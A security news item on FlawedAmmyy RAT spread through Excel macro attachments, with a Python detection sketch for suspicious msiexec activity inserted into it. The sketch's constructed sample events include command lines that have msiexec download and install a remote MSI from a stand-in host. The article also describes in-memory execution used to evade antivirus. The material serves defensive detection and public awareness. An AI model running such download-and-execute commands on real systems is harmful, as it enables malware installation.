Windows PCs targeted with new malware spread through .xls attachment

 

Microsoft Office applications are a perennial favorite target for cyber-criminals seeking to compromise Windows PCs. This is happening once again: fresh malware is being spread through an Excel attachment in e-mails, delivered via a macro. A macro is an action, or a set of actions packaged together, that can be run as many times as desired.

 

According to a warning from Microsoft, end-users need to be vigilant about a fresh malware attack that arrives as an Excel attachment and aims to infect Windows computers. The software giant's team of security experts says the Excel attachment starts a complex infection chain that downloads the infamous RAT named FlawedAmmyy and runs it directly in memory. The process uses macro functions to launch the assault on Windows computers. Proofpoint states that the malicious attack comes from a group named TA505, while FlawedAmmyy has gained notoriety ever since it targeted companies in the retail and finance sectors. www.zdnet.com posted this, June 24, 2019.

 

Microsoft warns people who receive an e-mail with an Excel attachment to avoid opening it.

 

If opened, the spreadsheet, without any user interaction, executes a macro function that runs an executable file named msiexec.exe, which then pulls down an MSI archive. That archive contains a digitally signed executable, which is extracted and executed; it then decrypts and executes another .exe file in memory.

 

Executing in memory helps the malicious software evade detection by AV programs that scrutinize only files on disk.

 

One particular file, wsus.exe, is subsequently pulled down and decrypted. It appears to be the legitimate WSUS (Windows Service Update Service) of Microsoft and is shown as digitally signed, dated 19th June; it then decrypts the malicious software in RAM, thereby planting FlawedAmmyy. www.timesnownews.com posted this, June 26, 2019.
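Because the later stages run in memory, the Excel-to-msiexec.exe step described above is the part of the chain that process-creation logging can still see. The following detection sketch is an added example, not code from Microsoft, Proofpoint or this article; it assumes telemetry with Sysmon Event ID 1 style fields and that the MSI source URL appears on the msiexec.exe command line, and every event in it is constructed.

```python
import re
from ntpath import basename  # parses Windows paths on any OS

OFFICE_PARENTS = {"excel.exe"}            # the article names Excel only
REMOTE_SOURCE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)
FIELDS = ("ProcessGuid", "ParentProcessGuid", "Image", "CommandLine")

# Constructed sample events (not from the article or from a real incident).
EVENTS = [dict(zip(FIELDS, row)) for row in [
    ("A1", "A0", r"C:\Program Files\Microsoft Office\Office16\EXCEL.EXE",
     r'EXCEL.EXE "C:\Users\kim\Downloads\order.xls"'),
    ("A2", "A1", r"C:\Windows\System32\msiexec.exe",
     "msiexec.exe /q /i http://files.example.invalid/pkg.msi"),
    ("B1", "B0", r"C:\Windows\System32\msiexec.exe",
     r"msiexec.exe /i C:\Installers\viewer.msi"),
    ("C1", "C0", r"C:\Program Files\Microsoft Office\Office16\EXCEL.EXE",
     "EXCEL.EXE /dde"),
    ("C2", "C1", r"C:\Windows\System32\cmd.exe", "cmd.exe /c start.bat"),
    ("C3", "C2", r"C:\Windows\SysWOW64\msiexec.exe",
     'msiexec /i "https://cdn.example.invalid/u.msi" /qn'),
    ("D1", "A1", r"C:\Windows\System32\msiexec.exe",
     r"msiexec.exe /i C:\Temp\local.msi"),
]]


def office_ancestor(guid, by_guid, max_depth=8):
    """Walk parent links; return the Office process name found, or None."""
    seen = set()
    while guid in by_guid and guid not in seen and len(seen) < max_depth:
        seen.add(guid)
        name = basename(by_guid[guid]["Image"]).lower()
        if name in OFFICE_PARENTS:
            return name
        guid = by_guid[guid]["ParentProcessGuid"]
    return None


def find_suspicious_msiexec(events):
    """Return (guid, office_ancestor, url) for msiexec fetching a remote source."""
    by_guid = {e["ProcessGuid"]: e for e in events}
    hits = []
    for e in events:
        if basename(e["Image"]).lower() != "msiexec.exe":
            continue
        url = REMOTE_SOURCE.search(e["CommandLine"])
        ancestor = office_ancestor(e["ParentProcessGuid"], by_guid)
        if url and ancestor:
            hits.append((e["ProcessGuid"], ancestor, url.group(0)))
    return hits
```

Calling `find_suspicious_msiexec(EVENTS)` flags the direct Excel child (A2) and the one launched through an intermediate cmd.exe (C3), while the local installs B1 and D1 are left alone.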

 

And since the attachment in the attack contains Korean-language characters, it seems the targets are Korean-speaking people operating Windows computers.

 

However, Microsoft states that the company's Threat Protection safeguards consumers against the attack. Microsoft is already battling this particular Windows malware while advising end-users not to enable macros.

 

» SPAMfighter News - 7/1/2019
